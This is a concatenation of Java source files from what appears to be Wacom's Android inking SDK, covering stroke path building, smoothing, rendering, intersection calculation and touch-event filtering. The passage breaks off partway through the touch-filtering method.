inkCanvas.clearColor(Color.WHITE); inkCanvas.drawLayer(strokesWithPreliminaryLayer, BlendMode.BLENDMODE_NORMAL); renderingContext.swap(); } private void buildPath(MotionEvent event){ float x = event.getX(); float y = event.getY(); double timestamp = TouchUtils.getTimestamp(event); FloatBuffer part = null; int partSize; boolean bFinishSmoothing = false; // Add the current input point to the path builder switch (event.getAction()){ case MotionEvent.ACTION_DOWN: part = pathBuilder.beginPath(x, y, timestamp); smoothener.reset(); break; case MotionEvent.ACTION_MOVE: part = pathBuilder.addPoint(x, y, timestamp); break; case MotionEvent.ACTION_UP: bFinishSmoothing = true; part = pathBuilder.endPath(x, y, timestamp); break; } SmoothingResult smoothingResult; if (part!=null){ partSize = pathBuilder.getPathPartSize(); // Smoothen the returned control points (aka path part). smoothingResult = smoothener.smooth(part, partSize, bFinishSmoothing); // Add the smoothed control points to the path builder. pathBuilder.addPathPart(smoothingResult.getSmoothedPoints(), smoothingResult.getSize()); } // Create a preliminary path. FloatBuffer preliminaryPath = pathBuilder.createPreliminaryPath(); // Smooth the preliminary path's control points (return inform of a path part). smoothingResult = smoothener.smooth(preliminaryPath, pathBuilder.getPreliminaryPathSize(), true); // Add the smoothed preliminary path to the path builder. pathBuilder.finishPreliminaryPath(smoothingResult.getSmoothedPoints(), smoothingResult.getSize()); } private void drawStroke(MotionEvent event){ switch (event.getAction()){ case MotionEvent.ACTION_DOWN: strokeJoin.reset(); // Reset areas, needed for correct drawing. prevPrelimArea.setNaN(); dirtyArea.setNaN(); // Use the same paint for the preliminary path. prelimPaint.copy(paint); prelimPaint.setRoundCaps(false, true); // Copy the strokesLayer content into the strokesWithPreliminaryLayer. 
inkCanvas.setTarget(strokesWithPreliminaryLayer); inkCanvas.drawLayer(strokesLayer, null, BlendMode.BLENDMODE_NONE); case MotionEvent.ACTION_MOVE: case MotionEvent.ACTION_UP: if (pathBuilder.getPathSize()>0){ if (pathBuilder.hasFinished()){ paint.setRoundCaps(false, true); } else { if (pathBuilder.getPathSize()==pathBuilder.getAddedPointsSize()){ paint.setRoundCaps(true, false); } else { paint.setRoundCaps(false, false); } } // Draw part of a path. if (pathBuilder.getAddedPointsSize() > 0) { inkCanvas.setTarget(strokesLayer); inkCanvas.drawStroke(paint, strokeJoin, pathBuilder.getPathBuffer(), pathBuilder.getPathLastUpdatePosition(), pathBuilder.getAddedPointsSize(), pathStride, 0.0f, 1.0f); // Set the dirty area of the current update and unite it with // the previous preliminary path dirty area (if any). dirtyArea.set(strokeJoin.getDirtyArea()); dirtyArea.union(prevPrelimArea); } inkCanvas.setTarget(strokesWithPreliminaryLayer); // Update only the dirty area. inkCanvas.setClipRect(dirtyArea); inkCanvas.drawLayer(strokesLayer, null, BlendMode.BLENDMODE_NONE); inkCanvas.disableClipRect(); prelimJoin.copy(strokeJoin); // Draw the preliminary path. inkCanvas.drawStroke(prelimPaint, prelimJoin, pathBuilder.getPreliminaryPathBuffer(), 0, pathBuilder.getFinishedPreliminaryPathSize(), pathBuilder.getStride(), 0.0f, 1.0f); // Save the preliminary path's dirty area (if any). prevPrelimArea.set(prelimJoin.getDirtyArea()); } break; } } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.manipulation; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.nio.FloatBuffer; import java.nio.IntBuffer; import java.util.Iterator; import android.graphics.RectF; import com.wacom.ink.utils.Logger; /** * This class is specialized in calculation of intersections between an {@link com.wacom.ink.manipulation.Intersectable Intersectable} instance and a target. 
* Therefore stroke models, which should be intersectable, sould implement the Intersectable interface.<br/> * A target could be a path, or an area enclosed by a path. * The class will calculate a list of intervals, covering the whole stroke. * They will start from the beginning of the stroke and finish at the end of it. * Every interval will be either entirely inside the target or entirely outside of the stroke. * The class could be also used to for fast checking if the stroke and target are intersecting at all, without calculating the intervals. * * @param <E> extends {@link com.wacom.ink.manipulation.Intersectable Intersectable} */ public class Intersector<E extends Intersectable> { private final static Logger logger = new Logger(Intersector.class); private final static int TARGET_NONE = 0; private final static int TARGET_AS_STROKE = 1; private final static int TARGET_AS_CLOSED_PATH = 2; private int currentTarget; /** * @hide */ public long handle; private IntersectionResult intersection; /** * Constructs an Intersector instance. 
*/ public Intersector() { handle = nativeInitialize(); currentTarget = TARGET_NONE; intersection = new IntersectionResult(); } private void setIntervalsResult(ByteBuffer indices, ByteBuffer values, ByteBuffer inside) { if (Logger.LOG_ENABLED) logger.i("called from JNI(1) / setIntervalsResult | " + indices.limit() + "," + indices.limit() + "," + inside.limit()); intersection.iterator.indices = indices.order(ByteOrder.nativeOrder()).asIntBuffer(); intersection.iterator.values = values.order(ByteOrder.nativeOrder()).asFloatBuffer(); intersection.iterator.inside = inside; if (Logger.LOG_ENABLED) logger.i("called from JNI(2) / setIntervalsResult | " + intersection.iterator.indices.limit() + "," + intersection.iterator.values.limit() + "," + inside.limit()); } private native long nativeInitialize(); private static native void nativeClassInitialize(); private static native void nativeCalculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering, FloatBuffer segmentBoundsBuf); /** * This method calculates the bounds of a segment of the specified path. * @param points The control points for the path. * @param pointsStride Defines the offset from one control point to the next. * @param width The width of the path. If the control points include a width property value, this parameter should be NAN. * @param index The index of the segment. * @param scattering * @param segmentBoundsRect An optional RectF instance, where the result will be stored. If this parameter is null, a new RectF instance is created and returned. * @return The bounds of the segment. 
*/ public static RectF calculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering, RectF segmentBoundsRect){ if (segmentBoundsRect==null){ segmentBoundsRect = new RectF(); } FloatBuffer segmentBounds = com.wacom.ink.utils.Utils.createNativeFloatBuffer(4); nativeCalculateSegmentBounds(points, pointsStride, width, index, scattering, segmentBounds); segmentBounds.position(0); segmentBoundsRect.left = segmentBounds.get(); segmentBoundsRect.top = segmentBounds.get(); segmentBoundsRect.right = segmentBoundsRect.left + segmentBounds.get(); segmentBoundsRect.bottom = segmentBoundsRect.top + segmentBounds.get(); return segmentBoundsRect; } /** * This method calculates the bounds of a single segment of a path. A segment is the curve between two control points. * @param points The control points for the path. * @param pointsStride Defines the offset from one control point to the next. * @param width The width of the path. If the control points include a width property value, this parameter should be NAN. * @param index The index of the segment. * @param scattering This parameter will increase the width of each point. A value of 1 will double the with. Value of 0 is the default value. Values greater than 0 are used for paths rendered with a particle brushes. * @return The bounds of the segment. */ public static RectF calculateSegmentBounds(FloatBuffer points, int pointsStride, float width, int index, float scattering){ return calculateSegmentBounds(points, pointsStride, width, index, scattering, null); } private native void nativeFinalize(long handle); @Override protected void finalize() throws Throwable { try { nativeFinalize(handle); } finally { super.finalize(); } } static { System.loadLibrary("InkingEngine"); nativeClassInitialize(); } /** * The Interval class specifies an interval of a path. 
Each interval has a fromIndex and an endIndex, defining the * the indices of the path points, the current interval starts from, and ends from, respectively. Each instance can be either inside or * outside the target of the intersection. */ public static class Interval { /** * The index of the segments's starting point inside the path. */ public int fromIndex; /** * The index of the segments's ending point inside the path. */ public int toIndex; /** * The starting value for the Catmull-Rom spline parameter (1 is the default value). */ public float fromValue; /** * The ending value for the Catmull-Rom spline parameter (1 is the default value). */ public float toValue; /** * Each instance can be either inside or outside the target of the intersection. This parameter holds this information as a boolean flag. */ public boolean inside; } /** * An iterator for intervals. */ public static class IntervalIterator implements Iterator<Interval> { private IntBuffer indices; private FloatBuffer values; private ByteBuffer inside; private int size; private int stride; private Interval interval = new Interval(); public void reset(int size, int stride) { if (indices!=null){ indices.position(0); } if (values!=null){ values.position(0); } if (inside!=null){ inside.position(0); } this.size = size; this.stride = stride; } @Override public boolean hasNext() { return indices.position() < size-1; } @Override public Interval next() { interval.fromIndex = indices.get() * stride; interval.fromValue = values.get(); interval.toIndex = indices.get() * stride; interval.toValue = values.get(); interval.inside = inside.get()!=(byte)0x00; return interval; } @Override public void remove() { } } /** * This class is designed to represent the result of an intersection operation. It holds the number of the intervals produced by the intersection and * an {@link com.wacom.ink.manipulation.Intersector.IntervalIterator IntervalIterator} allowing the programmer to traverse the computed intervals. 
 */
	public static class IntersectionResult {
		private IntervalIterator iterator; // reused across intersection calls
		private int intervalsSize;         // number of (index, value) entries; two per interval (see getCount)

		public IntersectionResult(){
			iterator = new IntervalIterator();
		}

		// Clears the result so it reports zero intervals.
		public void reset() {
			this.intervalsSize = 0;
			iterator.reset(0, 0);
		}

		// Adopts a new entry count and point stride after an intersection has been computed.
		public void reset(int intervalsSize, int stride) {
			this.intervalsSize = intervalsSize;
			iterator.reset(intervalsSize, stride);
		}

		/**
		 * This method returns the count of the intervals contained in the current IntersectionResult instance.
		 * @return count of intervals
		 */
		public int getCount(){
			// Each interval is described by two entries (from and to), hence the division by two.
			return intervalsSize/2;
		}

		/**
		 * This method returns an {@link com.wacom.ink.manipulation.Intersector.IntervalIterator IntervalIterator} with intervals,
		 * computed by the intersection operation.
		 * @return an iterator with intervals
		 */
		public IntervalIterator getIterator(){
			return iterator;
		}
	}

	/**
	 * This method sets a stroke as target of the intersection. This method assumes that the control points of the path, defining a stroke, include a width property value.
	 * @param points The control points for the path.
	 * @param position The position in float buffer of the first value of the path.
	 * @param size The size of the path. The size of the path is the number of float values inside the float buffer.
	 * @param stride Defines the offset from one control point to the next.
	 */
	public void setTargetAsStroke(FloatBuffer points, int position, int size, int stride){
		// NaN width signals that per-point width values are read from the control points.
		setTargetAsStroke(points, position, size, stride, Float.NaN);
	}

	private native void nativeSetTargetAsStroke(long handle, FloatBuffer points, int position, int size, int pointsStride, float width);

	/**
	 * This method sets a stroke as a target of the intersection.
	 * @param points The control points for the path.
	 * @param position The position in float buffer of the first value of the path.
	 * @param size The size of the path. The size of the path is the number of float values inside the float buffer.
	 * @param stride Defines the offset from one control point to the next.
	 * @param width The width of the path. If the control points include a width property value, this parameter should be NAN.
	 */
	public void setTargetAsStroke(FloatBuffer points, int position, int size, int stride, float width){
		// Fewer than four control points cannot define a segment; treat as "no target".
		if (size>=stride*4) {
			currentTarget = TARGET_AS_STROKE;
			nativeSetTargetAsStroke(handle, points, position, size, stride, width);
		} else {
			currentTarget = TARGET_NONE;
		}
	}

	private native void nativeSetTargetAsClosedPath(long handle, FloatBuffer points, int position, int size, int stride);

	/**
	 * This method sets an area enclosed by a path as a target of the intersection.
	 * @param points The control points for the path.
	 * @param position The position in float buffer of the first value of the path.
	 * @param size The size of the path. The size of the path is the number of float values inside the float buffer.
	 * @param stride Defines the offset from one control point to the next.
	 */
	public void setTargetAsClosedPath(FloatBuffer points, int position, int size, int stride){
		// Fewer than four control points cannot define a segment; treat as "no target".
		if (size>=stride*4) {
			currentTarget = TARGET_AS_CLOSED_PATH;
			nativeSetTargetAsClosedPath(handle, points, position, size, stride);
		} else {
			currentTarget = TARGET_NONE;
		}
	}

	private native void nativeIntersectWithTarget(long handle, FloatBuffer points, int size, int pointsStride, float width, float ts, float tf, float strokeBoundsX, float strokeBoundsY, float strokeBoundsW, float strokeBoundsH, FloatBuffer segmentsBounds);

	/**
	 * This method intersects an {@link com.wacom.ink.manipulation.Intersectable Intersectable} instance with the specified target.
	 * @param intersectableStroke A stroke implementing the Intersectable interface.
	 * @return The result of the intersection. It is important to note, that for performance reasons, each Intersector instance will return the same IntersectionResult each time this method is called.
*/ public IntersectionResult intersectWithTarget(E intersectableStroke){ //Some error handling if (currentTarget==TARGET_NONE){ intersection.reset(); return intersection; } nativeIntersectWithTarget(handle, intersectableStroke.getPoints(), intersectableStroke.getSize(), intersectableStroke.getStride(), intersectableStroke.getWidth(), intersectableStroke.getStartValue(), intersectableStroke.getEndValue(), intersectableStroke.getBounds().left, intersectableStroke.getBounds().top, intersectableStroke.getBounds().width(), intersectableStroke.getBounds().height(), intersectableStroke.getSegmentsBounds()); intersection.reset(getIntervalsSize(), intersectableStroke.getStride()); return intersection; } private native boolean nativeIsIntersectingTarget(long handle, FloatBuffer points, int size, int pointsStride, float width, float ts, float tf, float strokeBoundsX, float strokeBoundsY, float strokeBoundsW, float strokeBoundsH, FloatBuffer segmentsBounds); /** * This method checks if a {@link com.wacom.ink.manipulation.Intersectable Intersectable} intersects with the specified target. No intervals calculation is being performed. * @param intersectableStroke A stroke implementing the Intersectable interface. * @return True if the stroke is inside the target, false otherwise. 
*/ public boolean isIntersectingTarget(E intersectableStroke){ return nativeIsIntersectingTarget(handle, intersectableStroke.getPoints(), intersectableStroke.getSize(), intersectableStroke.getStride(), intersectableStroke.getWidth(), intersectableStroke.getStartValue(), intersectableStroke.getEndValue(), intersectableStroke.getBounds().left, intersectableStroke.getBounds().top, intersectableStroke.getBounds().width(), intersectableStroke.getBounds().height(), intersectableStroke.getSegmentsBounds()); } private native int nativeGetIntervalsSize(long handle); private int getIntervalsSize(){ return nativeGetIntervalsSize(handle); } } <file_sep>package com.wacom.ink.trial; public class Trial { @SuppressWarnings("unused") private static final String EXPIRATION = "1429747200"; @SuppressWarnings("unused") private static final String SIGNATURE = "<KEY>; }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.path; import java.nio.FloatBuffer; /** * The SpeedPathBuilder class is a specialized PathBuilder designed for building of paths from velocity based user input. * */ public class SpeedPathBuilder extends PathBuilder{ /** * Constructs a new instance. * @param density Specify density value used in normalization config. */ public SpeedPathBuilder(float density) { super(density); } private native long nativeInitialize(float density); private native void nativeBeginPath(long handle, float x, float y, double timestamp); private native void nativeAddPoint(long handle, float x, float y, double timestamp); private native void nativeEndPath(long handle, float x, float y, double timestamp); /** * Starts building a path from velocity based input. Normally this method is called on a touch down event. * The method calculates a path part (a set of path control points) from the provided input. 
* The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer beginPath(float x, float y, double timestamp) { beginPath(); nativeBeginPath(handle, x, y, timestamp); return getPathPartBuffer(); } /** * Continues the path generation from velocity based input. Normally this method is called on a touch move event. * The method calculates a path part (a set of path control points) from the provided input. * The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer addPoint(float x, float y, double timestamp) { nativeAddPoint(handle, x, y, timestamp); return getPathPartBuffer(); } /** * Ends the path generation from velocity based input. Normally this method is called on a touch up event. * The method calculates a path part (a set of path control points) from the provided input. 
* The returned path part can be modified by clients before adding it to the currently built path with the {@link #addPathPart(FloatBuffer, int)} method (for example the part could be first smoothened). * @param x The x coordinate of the user's input in the desired path's coordinate system. * @param y The y coordinate of the user's input in the desired path's coordinate system. * @param timestamp The timestamp of the user's input in seconds with double precision. It is used for the velocity calculation. * @return A part of a path (a set of control points) as a float buffer. */ public FloatBuffer endPath(float x, float y, double timestamp) { nativeEndPath(handle, x, y, timestamp); return getPathPartBuffer(); } @Override protected long initialize(float density) { return nativeInitialize(density); } @Override /** * Sets the min and max velocities that will be used for clamping the input values. * @param minValue The minimum velocity. * @param maxValue The maximum velocity. */ public void setNormalizationConfig(float minValue, float maxValue) { nativeSetNormalizationConfig(handle, density*minValue, density*maxValue); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.rasterization; import android.graphics.Color; import com.wacom.ink.utils.Utils; /** * The StrokePaint class holds the {@link StrokeBrush}, color, width and cap beginning/ending information about how to draw strokes. * Stroke paint instances are being passed to the {@link InkCanvas#drawStroke(StrokePaint, StrokeJoin, java.nio.FloatBuffer, int, int, int, float, float)} method. 
*/ public class StrokePaint { /** * @hide */ public long handle; private StrokeBrush strokeBrush; private float a,r,g,b; private boolean bRoundCapBeginning; private boolean bRoundCapEnding; private float width; private int color; private native long nativeInitialize(); private native void nativeFinalize(long handle); public StrokePaint(){ this(null); } /** * Creates and initializes an instance with the specified brush. * * @param strokeBrush The brush can be solid color or particle brush. */ public StrokePaint(StrokeBrush strokeBrush){ a = 0.0f; r = 0.0f; g = 0.0f; b = 0.0f; width = Float.NaN; handle = nativeInitialize(); setStrokeBrush(strokeBrush); setColor(r, g, b, a); setWidth(width); setRoundCapBeginning(true); setRoundCapEnding(true); } private native void nativeSetStrokeBrush(long handle, long strokeBrushHandle); /** * Sets the brush this paint instance should draw with. * @param strokeBrush The brush can be solid color or particle brush. */ public void setStrokeBrush(StrokeBrush strokeBrush){ this.strokeBrush = strokeBrush; if (strokeBrush!=null){ nativeSetStrokeBrush(handle, strokeBrush.getStrokeBrushHandle()); } } public StrokeBrush getStrokeBrush(){ return strokeBrush; } private native void nativeSetColor(long handle, float r, float g, float b, float a); /** * Sets the color to draw with. * @param r The red component as float from 0 to 1. * @param g The green component as float from 0 to 1. * @param b The blue component as float from 0 to 1. * @param a The alpha component as float from 0 to 1. 
*/ public void setColor(float r, float g, float b, float a){ this.r = r; this.g = g; this.b = b; this.a = a; nativeSetColor(handle, r, g, b, a); updateColor(); } public float getRed(){ return r; } public float getGreen(){ return g; } public float getBlue(){ return b; } public float getAlpha(){ return a; } public boolean isRoundCapBeginning() { return bRoundCapBeginning; } private native void nativeSetRoundCapBeginning(long handle, boolean bRoundCapBeginning); public void setRoundCapBeginning(boolean bRoundCapBeginning) { this.bRoundCapBeginning = bRoundCapBeginning; nativeSetRoundCapBeginning(handle, bRoundCapBeginning); } public boolean isRoundCapEnding() { return bRoundCapEnding; } private native void nativeSetRoundCapEnding(long handle, boolean bRoundCapEnding); public void setRoundCapEnding(boolean bRoundCapEnding) { this.bRoundCapEnding = bRoundCapEnding; nativeSetRoundCapEnding(handle, bRoundCapEnding); } /** * Gets the width of the stroke. * @return The width. */ public float getWidth() { return width; } public void setColor(int color){ setColor(color, 1.0f); } /** * Gets the current color. * @return The color. */ public int getColor(){ return color; } public void setColorRGB(int color){ float colorArray[] = Utils.colorToArray(color); setColorRGB(colorArray[1], colorArray[2], colorArray[3]); } public void setAlpha(int color){ // float colorArr[] = Utils.colorToArray(color); // setAlpha(colorArr[4]); setAlpha(Color.alpha(color)/255.0f); updateColor(); } public void setColor(int color, float overwriteAlpha){ float colorArr[] = Utils.colorToArray(color); setColor(colorArr[1], colorArr[2], colorArr[3], Float.isNaN(overwriteAlpha)?colorArr[0]:overwriteAlpha); } private native void nativeSetWidth(long handle, float width); /** * Set the width of the stroke. * @param width If this parameter is NAN, a variable width path is expected. 
*/ public void setWidth(float width) { nativeSetWidth(handle, width); this.width = width; } private native void nativeSetAlpha(long handle, float a); public void setAlpha(float alpha){ this.a = alpha; nativeSetAlpha(handle, a); } private native void nativeSetColorRGB(long handle, float r, float g, float b); public void setColorRGB(float r, float g, float b){ this.r = r; this.g = g; this.b = b; updateColor(); nativeSetColorRGB(handle, r, g, b); } public void copy(StrokePaint paint){ setColor(paint.r, paint.g, paint.b, paint.a); setWidth(paint.width); setRoundCapBeginning(paint.bRoundCapBeginning); setRoundCapEnding(paint.bRoundCapEnding); setStrokeBrush(paint.strokeBrush); } public void updateColor(){ if (Float.isNaN(a)){ this.color = Color.rgb((int)(r*255.0f), (int)(g*255.0f), (int)(b*255.0f)); } else { this.color = Color.argb((int)(a*255.0f), (int)(r*255.0f), (int)(g*255.0f), (int)(b*255.0f)); } } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } public void setRoundCaps(boolean bRoundCapBeginning, boolean bRoundCapEnding) { setRoundCapBeginning(bRoundCapBeginning); setRoundCapEnding(bRoundCapEnding); } @Override public String toString() { return "strokeBrush: " + strokeBrush + "; a: " + a + ",r: " + r + ",g: " + g + ",b: " + b + "; caps:" + bRoundCapBeginning + "," + bRoundCapEnding + "; width: " + width; } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. */ package com.wacom.ink.utils; import android.view.MotionEvent; /** * OpenGl utility class. * */ public class TouchUtils { private final static Logger logger = new Logger(TouchUtils.class, true); public final static float NO_PRESSURE = -1.0f; public final static double NO_TIMESTAMP = -1.0d; private final static float MINIMUM_POINT_DISTANCE = 2f; /** * Constant: Minimum reported pressure by the Android Framework. 
	 * <br/>According to Android Docs: "<i>For a touch screen or touch pad, reports the approximate pressure applied to the surface by a finger or other tool.
	 * The value is normalized to a range from 0 (no pressure at all) to 1 (normal pressure), although values higher than 1 may be generated depending on the calibration of the input device.</i>"
	 * <br/>That's why we take 0 for minimum and 1 maximum value.
	 */
	public final static float TOUCHINPUT_MIN_PRESSURE = 0.0f;

	/**
	 * Constant: Maximum reported pressure by the Android Framework.
	 * <br/>According to Android Docs: "<i>For a touch screen or touch pad, reports the approximate pressure applied to the surface by a finger or other tool.
	 * The value is normalized to a range from 0 (no pressure at all) to 1 (normal pressure), although values higher than 1 may be generated depending on the calibration of the input device.</i>"
	 * <br/>That's why we take 0 for minimum and 1 maximum value.
	 */
	public final static float TOUCHINPUT_MAX_PRESSURE = 1.0f;

	/**
	 * Constant: for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event couldn't be interpreted as valid stroke event by the Wacom Ink.
	 */
	public final static int STROKE_EVENT_FAIL = -1;

	/**
	 * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke begin event by the Wacom Ink.
	 */
	public final static int STROKE_EVENT_BEGIN = 0;

	/**
	 * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke move event by the Wacom Ink.
	 */
	public final static int STROKE_EVENT_MOVE = 1;

	/**
	 * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke end event by the Wacom Ink.
	 */
	public final static int STROKE_EVENT_END = 2;

	/**
	 * Constant for {@link #filterMotionEventForInking(MotionEvent, TouchPointID)}: The current motion event should be interpreted as stroke end event by the Wacom Ink.
	 * This constant is used when the Android Framework reports a MotionEvent.ACTION_CANCEL event, which should be treated as stroke end event.
	 * Because the current MotionEvent is outside the screen, in this particular scenario the previous touch event's data should be used for the stroke end event ({@link TouchPointID#getOldX()}, {@link TouchPointID#getOldY()}).
	 */
	public final static int STROKE_EVENT_FORCEEND = 3;

	/**
	 * Maps a raw pressure value from the source range into the destination range.
	 * Non-stylus events yield {@link #NO_PRESSURE}; the pressure is clamped to srcMaxPressure
	 * before being transformed.
	 */
	public static float normalizePressure(float pressure, float srcMinPressure, float srcMaxPressure, float dstMinPressure, float dstMaxPressure, boolean bIsStylusEvent){
		if (!bIsStylusEvent){
			return NO_PRESSURE;
		}
		return Utils.transformValue(Math.min(srcMaxPressure, pressure), srcMinPressure, srcMaxPressure, dstMinPressure, dstMaxPressure);
	}

	// True when the tool that produced the event's current action is a stylus.
	public static boolean isStylusEvent(MotionEvent event) {
		return event.getToolType(event.getActionIndex())==MotionEvent.TOOL_TYPE_STYLUS;
	}

	/**
	 * Return an Wacom Ink based timestamp for the given MotionEvent.
	 * @param event a MotionEvent object
	 * @return timestamp in seconds
	 */
	public static double getTimestamp(MotionEvent event){
		double ts = event.getEventTime()/1000.0;
		return ts;
	}

	/**
	 * Returns an Wacom Ink based timestamp from the given timestamp.
	 * @param timestampInMillis timestamp in milliseconds
	 *
	 * @return timestamp in seconds
	 */
	public static double getTimestamp(long timestampInMillis){
		return timestampInMillis/1000.0;
	}

	/**
	 * Object used to keep track of the coordinates, timestamp and the pointerId of an Android MotionEvent object.
	 * <p/>
	 * TouchPointID objects are used to store Android MotionEvent's data, relevant for the Wacom Ink stroke's lifecycle.
*/ public static class TouchPointID { private float x; private float y; private long timestamp; private float pressure; private int pointerId; private float oldX; private float oldY; private float oldPressure; private long oldTimestamp; public TouchPointID(float x, float y, int pointerId){ oldX = -1; oldY = -1; this.x = x; this.y = y; this.pointerId = pointerId; timestamp = -1; } public TouchPointID() { this(-1, -1, -1); } public float getX() { return x; } public void setX(float x) { oldX = this.x; this.x = x; } public float getY() { return y; } public void setY(float y) { oldY = this.y; this.y = y; } public float getPressure() { return pressure; } public void setPressure(float pressure) { oldPressure = this.pressure; this.pressure = pressure; } public long getTimestamp() { return timestamp; } public void setTimestamp(long timestamp) { oldTimestamp = this.timestamp; this.timestamp = timestamp; } public int getPointerId() { return pointerId; } public void setPointerId(int pointerId) { this.pointerId = pointerId; } public void invalidate(){ pointerId=-1; setX(-1); setY(-1); setTimestamp(-1); setPressure(-1); } public boolean isValidXY(){ return x>=0 && y>=0; } public boolean isValidOldXY(){ return oldX>=0 && oldY>=0; } public float getOldX(){ return oldX; } public float getOldY(){ return oldY; } public long getOldTimestamp(){ return oldTimestamp; } public float getOldPressure(){ return oldPressure; } public boolean isValid(){ return pointerId>=0; } public boolean isInvalid(){ return !isValid(); } public void setData(MotionEvent motionEvent, int pointerIndex){ this.setX(motionEvent.getX(pointerIndex)); this.setY(motionEvent.getY(pointerIndex)); this.setTimestamp(motionEvent.getEventTime()); this.setPressure(motionEvent.getPressure(pointerIndex)); this.setPointerId(motionEvent.getPointerId(pointerIndex)); } public void setData(MotionEvent motionEvent) { setData(motionEvent, motionEvent.getActionIndex()); } } /** * Translates Android Framework MotionEvents into Wacom 
 Ink stroke events, performing basic analysis based on the current MotionEvent and the previously received touch input.
	 * <p/> According to the InkingEngine Core's documentation, a stroke's life cycle starts with a stroke begin event, followed by at least one stroke move event and finishes with a stroke end event.
	 * <p/>In order to ensure the correct Wacom Ink stroke's life cycle, the Android Framework's touch input is being filtered for every dispatched MotionEvent,
	 * the expected stroke's state is being returned and the current touch event's relevant data (x,y coordinates, pressure, action type, etc.) are being stored in a TouchPointID object in order
	 * to be used again as reference during the next call of this method.
	 * @param motionEvent an MotionEvent reported by the Android Framework.
	 * @param touchPointID a TouchPointID object containing relevant data of the previous MotionEvent.
	 *
	 * @return The expected stroke's event.
	 * <p/>Possible values:
	 * <br/>{@link #STROKE_EVENT_BEGIN},
	 * <br/>{@link #STROKE_EVENT_MOVE},
	 * <br/>{@link #STROKE_EVENT_END},
	 * <br/>{@link #STROKE_EVENT_FAIL},
	 * <br/>{@link #STROKE_EVENT_FORCEEND}
	 */
	public static int filterMotionEventForInking(MotionEvent motionEvent, TouchPointID touchPointID){
		int activePointerIndex = motionEvent.getActionIndex();
		int currentPointerId = motionEvent.getPointerId(activePointerIndex);
		int failCode = STROKE_EVENT_FAIL;
		switch (motionEvent.getActionMasked()){
		case MotionEvent.ACTION_DOWN:
			// Primary pointer down: a stroke must not already be in progress.
			if (touchPointID.isValid()){
				throw new RuntimeException("ACTION_DOWN / already inking?");
			} else {
				touchPointID.setData(motionEvent);
			}
			if (logger.isEnabled()){
				if (Logger.LOG_ENABLED) logger.d("ACTION_DOWN / OK, down");
			}
			return STROKE_EVENT_BEGIN;
		case MotionEvent.ACTION_POINTER_DOWN:
			if (touchPointID.isInvalid()){
				//no prev point so we can begin, it's ok
				touchPointID.setData(motionEvent, activePointerIndex);
				if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_DOWN / OK, ptr_down: no prev point so we can begin");
				return STROKE_EVENT_BEGIN;
			} else {
				//prev point available, it can't be, fail!
				if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_DOWN / FAIL, ptr_down: prev point available, it can't be");
				return failCode;
			}
		case MotionEvent.ACTION_MOVE:
			if (touchPointID.isInvalid()){
				if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / FAIL, move: invalid last point");
				return failCode;
			}
			// Moves are tracked by the stored pointer id, not by the event's action index.
			int prevPointerIndex = motionEvent.findPointerIndex(touchPointID.getPointerId());
			if (prevPointerIndex==-1){
				//glitch: prev pointer id disappeared?! it's impossible! fail!
				throw new RuntimeException("ACTION_MOVE / prev pointer id disappeared?! it's impossible! fail!");
			} else if (!hasReallyMoved(motionEvent.getX(prevPointerIndex), motionEvent.getY(prevPointerIndex), touchPointID.getX(), touchPointID.getY())){
				//glitch: new move event, but the x,y coordinates are the same as the prev ones, fail!
				if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / FAIL, move: new move event, but the x,y coordinates are the same as the prev ones");
				return failCode;
			} else {
				//use prev. pointer id to take the data, it's ok
				if (Logger.LOG_ENABLED) logger.d("ACTION_MOVE / OK, move: use prev. pointer id to take the data");
				touchPointID.setData(motionEvent, prevPointerIndex);
				return STROKE_EVENT_MOVE;
			}
		case MotionEvent.ACTION_UP:
			if (touchPointID.isInvalid()){
				//glitch: prev point it missing?! it's impossible! fail!
				if (Logger.LOG_ENABLED) logger.d("ACTION_UP / FAIL, up: prev point it missing?! it's impossible!");
				return failCode;
			} else {
				//prev point it available, it's ok
				if (Logger.LOG_ENABLED) logger.d("ACTION_UP / OK, up: prev point is available");
				touchPointID.invalidate();
				return STROKE_EVENT_END;
			}
		case MotionEvent.ACTION_POINTER_UP:
			if (touchPointID.isInvalid()){
				//no prev point, discard point, fail!
				if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_UP / FAIL, ptr_up: no prev point, discard point");
				return failCode;
			}
			if (currentPointerId == touchPointID.getPointerId()){
				//prev pointer id is the same, it's ok
				touchPointID.invalidate();
				if (Logger.LOG_ENABLED) logger.d("ACTION_POINTER_UP / OK, ptr_up: prev pointer id is the same");
				return STROKE_EVENT_END;
			} else {
				//prev pointer id is different, fail!
				return failCode;
			}
		case MotionEvent.ACTION_CANCEL:
			if (touchPointID.isValid()){
				touchPointID.invalidate();
